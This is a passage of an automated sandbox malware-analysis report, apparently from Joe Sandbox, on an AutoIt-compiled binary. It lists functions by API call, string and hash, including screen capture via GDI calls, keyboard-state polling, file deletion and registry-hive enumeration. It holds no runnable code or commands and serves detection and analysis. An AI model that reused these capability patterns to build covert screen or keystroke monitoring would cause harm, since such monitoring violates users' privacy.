                          • Opcode ID: 7cc9989f50cdaa401a0519194237394089faa597a01c5bf7a9cc68b25ba81870
                          • Instruction ID: 88be1f8ef24a968db893b9fa5bb7aa0133b3f4238d73aabac3d781591587abcc
                          • Opcode Fuzzy Hash: 7cc9989f50cdaa401a0519194237394089faa597a01c5bf7a9cc68b25ba81870
                          • Instruction Fuzzy Hash: 6D514C75900209FFDF009FA4DC45EEEBBB9FF44304F14819AEA15AB2A4DB319A05CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 00B5A2DD
                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B5A2E9
                          • CreateCompatibleDC.GDI32(?), ref: 00B5A2F5
                          • SelectObject.GDI32(00000000,?), ref: 00B5A302
                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B5A356
                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00B5A392
                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B5A3B6
                          • SelectObject.GDI32(00000006,?), ref: 00B5A3BE
                          • DeleteObject.GDI32(?), ref: 00B5A3C7
                          • DeleteDC.GDI32(00000006), ref: 00B5A3CE
                          • ReleaseDC.USER32(00000000,?), ref: 00B5A3D9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                          • String ID: (
                          • API String ID: 2598888154-3887548279
                          • Opcode ID: 0dbe643b050fc7482d9831dcb841f557d06435b8c483a525a2043ff014dc9814
                          • Instruction ID: 23ca11eae6f1a6b999f14218edd8bc0a416e3b91e3bb56180d3b37e522c84288
                          • Opcode Fuzzy Hash: 0dbe643b050fc7482d9831dcb841f557d06435b8c483a525a2043ff014dc9814
                          • Instruction Fuzzy Hash: 47515971900309AFCB10DFA8DC89EAEBBF9EF48310F14855EF94AA7260C731A845CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6E541 Relevance: 21.1, APIs: 14, Instructions: 129filecommemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00B6E564
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00B6E57B
                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00B6E586
                          • CloseHandle.KERNEL32(00000000), ref: 00B6E593
                          • GlobalFix.KERNEL32(00000000), ref: 00B6E59C
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00B6E5AB
                          • GlobalUnWire.KERNEL32(00000000), ref: 00B6E5B4
                          • CloseHandle.KERNEL32(00000000), ref: 00B6E5BB
                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B8D9BC,?), ref: 00B6E5E5
                          • GlobalFree.KERNEL32(00000000), ref: 00B6E5F5
                          • GetObjectW.GDI32(?,00000018,000000FF), ref: 00B6E619
                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 00B6E644
                          • DeleteObject.GDI32(00000000), ref: 00B6E66C
                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B6E682
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Global$File$CloseHandleObject$AllocCopyCreateDeleteFreeImageLoadMessagePictureReadSendSizeWire
                          • String ID:
                          • API String ID: 237262595-0
                          • Opcode ID: 125d99e9d37e4ba4af9dda550f65fd2933cab0210ad809700973c6e8c3307471
                          • Instruction ID: 5da869eda780475ebf69636cf56befebef447082d41f044e8a9286b236e412bb
                          • Opcode Fuzzy Hash: 125d99e9d37e4ba4af9dda550f65fd2933cab0210ad809700973c6e8c3307471
                          • Instruction Fuzzy Hash: 57413A75600208EFDB11AF65DC88EAA7BB9EF89725F108059F916E72A0DB35DD01DB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 00B4D567
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B4D589
                          • __swprintf.LIBCMT ref: 00B4D5DC
                          • _wprintf.LIBCMT ref: 00B4D68D
                          • _wprintf.LIBCMT ref: 00B4D6AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-2391861430
                          • Opcode ID: 3a1c0ef564d2eebc06eb39de8c915984012943073996025cdd79a3bb94431510
                          • Instruction ID: b32a7aee7b8df1a8b03e254d2fcea2627fb09a469acdeb8148fd91dd6cec59e6
                          • Opcode Fuzzy Hash: 3a1c0ef564d2eebc06eb39de8c915984012943073996025cdd79a3bb94431510
                          • Instruction Fuzzy Hash: AA515E71900109BADB15EBA0DD46EEEBBF9EF14700F1045A5F106B20A2EF716F58DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                          Download Yara Rule
                          APIs
                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00B4D37F
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B4D3A0
                          • __swprintf.LIBCMT ref: 00B4D3F3
                          • _wprintf.LIBCMT ref: 00B4D499
                          • _wprintf.LIBCMT ref: 00B4D4B7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LoadString_wprintf$__swprintf_memmove
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2116804098-3420473620
                          • Opcode ID: 60c6ad05d10d7e66a7e226f8c390a8e2925120a34003403c3212761150e60a40
                          • Instruction ID: c6a8d65e947146ad942938e64ccef25607fc2a77a370c6d5ea5af25aef4e12ac
                          • Opcode Fuzzy Hash: 60c6ad05d10d7e66a7e226f8c390a8e2925120a34003403c3212761150e60a40
                          • Instruction Fuzzy Hash: 68518171900109BBDB15EBA0DD46EEEBBF9EF14700F1044E6B106B21A2EB716F58DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B63AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                          Download Yara Rule
                          APIs
                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                          • API String ID: 3964851224-909552448
                          • Opcode ID: bcf810627e97e0d8f8a30ec9ba1999f0715138a8b91aa5fa1a4dbe962186f2a2
                          • Instruction ID: c68614a407728ecfa0a1791940592dbd15d391870433bca1955b0fd61264a936
                          • Opcode Fuzzy Hash: bcf810627e97e0d8f8a30ec9ba1999f0715138a8b91aa5fa1a4dbe962186f2a2
                          • Instruction Fuzzy Hash: 9F41673511034A8BDF14EF04D880AFA33E1FF66750F6408E4FC625B29ADB749A5ACB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B483D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B4843F
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B48455
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B48466
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B48478
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B48489
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: SendString$_memmove
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 2279737902-1007645807
                          • Opcode ID: 174146fbdbe8fa92161c88ab058d99020cdbcfcab6885bddc0540390f6112bce
                          • Instruction ID: 6068b617f087931e80673f0a44c1c4a01992f7b16cc3fd23f7f4b0ac7c090110
                          • Opcode Fuzzy Hash: 174146fbdbe8fa92161c88ab058d99020cdbcfcab6885bddc0540390f6112bce
                          • Instruction Fuzzy Hash: 1D1182A5A401597AD720A7A1DC4ADFF7EFCEB91F00F4408A97411A21E1DEB05E44C6B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B48097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 00B4809C
                            • Part of subcall function 00B1E3A5: timeGetTime.WINMM(?,75C0B400,00B76163), ref: 00B1E3A9
                          • Sleep.KERNEL32(0000000A), ref: 00B480C8
                          • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 00B480EC
                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00B4810E
                          • SetActiveWindow.USER32 ref: 00B4812D
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B4813B
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B4815A
                          • Sleep.KERNEL32(000000FA), ref: 00B48165
                          • IsWindow.USER32 ref: 00B48171
                          • EndDialog.USER32(00000000), ref: 00B48182
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: 756ebfe12e161b0a0edcfa4fdbf50a90f881c748b7e8196b89178a1573280ae2
                          • Instruction ID: 7bfe56b1914d2baa83df6995bc683d95d95227dbe182b25518b22f4328ef46ee
                          • Opcode Fuzzy Hash: 756ebfe12e161b0a0edcfa4fdbf50a90f881c748b7e8196b89178a1573280ae2
                          • Instruction Fuzzy Hash: A521AE70200204BFE7266B61EC89E6A7BEAFB19B89B444156F511933B1DF728F05EB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B432B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00B73C64,00000010,00000000,Bad directive syntax error,00B9DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00B432D1
                          • LoadStringW.USER32(00000000,?,00B73C64,00000010), ref: 00B432D8
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • _wprintf.LIBCMT ref: 00B43309
                          • __swprintf.LIBCMT ref: 00B4332B
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00B43395
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 1506413516-4153970271
                          • Opcode ID: 3de40961ebc7469d148bb8e822afc83810cd19c00e8cf344941da6ca8ae2fb53
                          • Instruction ID: 48d2c7f98278b8f0fa0bcb600acab7b2fc2f9b4fdbea19979dd0a5c1c8c04d24
                          • Opcode Fuzzy Hash: 3de40961ebc7469d148bb8e822afc83810cd19c00e8cf344941da6ca8ae2fb53
                          • Instruction Fuzzy Hash: D2213D31940219BBDF11EF90CC4AEEE7BF9FF14B00F004496B516A10E1EAB1AB54DB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B4C6A0: __time64.LIBCMT ref: 00B4C6AA
                            • Part of subcall function 00B041A7: _fseek.LIBCMT ref: 00B041BF
                          • __wsplitpath.LIBCMT ref: 00B4C96F
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcscpy.LIBCMT ref: 00B4C982
                          • _wcscat.LIBCMT ref: 00B4C995
                          • __wsplitpath.LIBCMT ref: 00B4C9BA
                          • _wcscat.LIBCMT ref: 00B4C9D0
                          • _wcscat.LIBCMT ref: 00B4C9E3
                            • Part of subcall function 00B4C6E4: _memmove.LIBCMT ref: 00B4C71D
                            • Part of subcall function 00B4C6E4: _memmove.LIBCMT ref: 00B4C72C
                          • _wcscmp.LIBCMT ref: 00B4C92A
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF49
                            • Part of subcall function 00B4CE59: _wcscmp.LIBCMT ref: 00B4CF5C
                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B4CB8D
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B4CC24
                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B4CC3A
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B4CC4B
                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B4CC5D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                          • String ID:
                          • API String ID: 152968663-0
                          • Opcode ID: a418542074cca4a5eccc45b928e46b086a6752ce435efbb09e580e04e13067cc
                          • Instruction ID: ed83bbe57de6a06a10569f2cefc04d092bcfa3805602c6669e31e3e3a0cf0534
                          • Opcode Fuzzy Hash: a418542074cca4a5eccc45b928e46b086a6752ce435efbb09e580e04e13067cc
                          • Instruction Fuzzy Hash: 14C12AB1901129AACF50DF95CC81ADEBBF9EF59710F0040EAB609E6151DB709B849FA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00B43908
                          • SetKeyboardState.USER32(?), ref: 00B43973
                          • GetAsyncKeyState.USER32(000000A0), ref: 00B43993
                          • GetKeyState.USER32(000000A0), ref: 00B439AA
                          • GetAsyncKeyState.USER32(000000A1), ref: 00B439D9
                          • GetKeyState.USER32(000000A1), ref: 00B439EA
                          • GetAsyncKeyState.USER32(00000011), ref: 00B43A16
                          • GetKeyState.USER32(00000011), ref: 00B43A24
                          • GetAsyncKeyState.USER32(00000012), ref: 00B43A4D
                          • GetKeyState.USER32(00000012), ref: 00B43A5B
                          • GetAsyncKeyState.USER32(0000005B), ref: 00B43A84
                          • GetKeyState.USER32(0000005B), ref: 00B43A92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 02faeb52efbf056852039375002c9a66c1a44b2af5fb4adfb00b8a11c9dbbdd4
                          • Instruction ID: 32e20c145097c4ca3315b62bf70bb34f3d635543d71728da065c63d86a56b34f
                          • Opcode Fuzzy Hash: 02faeb52efbf056852039375002c9a66c1a44b2af5fb4adfb00b8a11c9dbbdd4
                          • Instruction Fuzzy Hash: D7519520A0478869FB35EBA488517EEEBF4DF11B40F0C85DAD5C25A1C3DB549B8CEB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B3FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                          Download Yara Rule
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 00B3FB19
                          • GetWindowRect.USER32(00000000,?), ref: 00B3FB2B
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00B3FB89
                          • GetDlgItem.USER32(?,00000002), ref: 00B3FB94
                          • GetWindowRect.USER32(00000000,?), ref: 00B3FBA6
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00B3FBFC
                          • GetDlgItem.USER32(?,000003E9), ref: 00B3FC0A
                          • GetWindowRect.USER32(00000000,?), ref: 00B3FC1B
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00B3FC5E
                          • GetDlgItem.USER32(?,000003EA), ref: 00B3FC6C
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B3FC89
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00B3FC96
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 08d4df480ef9c0eb3236bb477ff750efd364fc38411aeb02642468122d5882b7
                          • Instruction ID: f8ee25d9189fea09fb76f04a997dcc3fc27fa6f4f1969861f3828271ae9b181c
                          • Opcode Fuzzy Hash: 08d4df480ef9c0eb3236bb477ff750efd364fc38411aeb02642468122d5882b7
                          • Instruction Fuzzy Hash: E951F171B00209AFDB18DF69DD95AAEBBB5EB88710F64816DF915D72D0DB709D00CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B1B155: GetWindowLongW.USER32(?,000000EB), ref: 00B1B166
                          • GetSysColor.USER32(0000000F), ref: 00B1B067
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
